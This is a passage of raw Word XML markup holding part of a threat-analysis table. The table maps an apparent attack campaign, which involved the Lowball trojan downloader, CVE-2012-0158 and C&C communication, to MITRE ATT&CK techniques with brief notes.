            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="2EBE3FEE" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406A662B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDE50D8" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D0446A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BDD5718" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55632396" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57591299" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F2B6102" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E355303" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00B857D7" w14:paraId="3A1657D8" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53A75CE2" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56A3389F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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4EC00287" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="372DDBEC" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="755AAF45" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3302CF4C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD75960" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="198C6549" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00B857D7" w14:paraId="4D529754" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0634C766" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D243EF"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6A850449" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0243E8" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF3D786" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA00B05" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CD38266" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="593E7D1D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Includes malicious file (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">trojan downloader </w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Lowball</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> [2]</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00B857D7" w14:paraId="7B8CD12E" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74844A87" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="122C1528"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4034599A"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661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="335E3A05" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E499D3" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CEDFC7C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70FBE9CD" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B4545A0" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The user tricked into execution (CVE-2012-0158 allow remote attackers to execute arbitrary code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="4274AF83" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6441CB8B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B2A7AD2" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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37B6B6A3" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>071</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">.001 Application Layer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778957B7" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AF6F2C7" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ECC9A55" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4960DC" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C159151" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This technique to provides more detail on step below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="5C33C128" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117DFB53" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291F649D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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34639D1F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8F900A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A95D168" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408F73B3" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A56699A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="401E0F0A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial installation connects to C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="666AB82C" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48860328" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
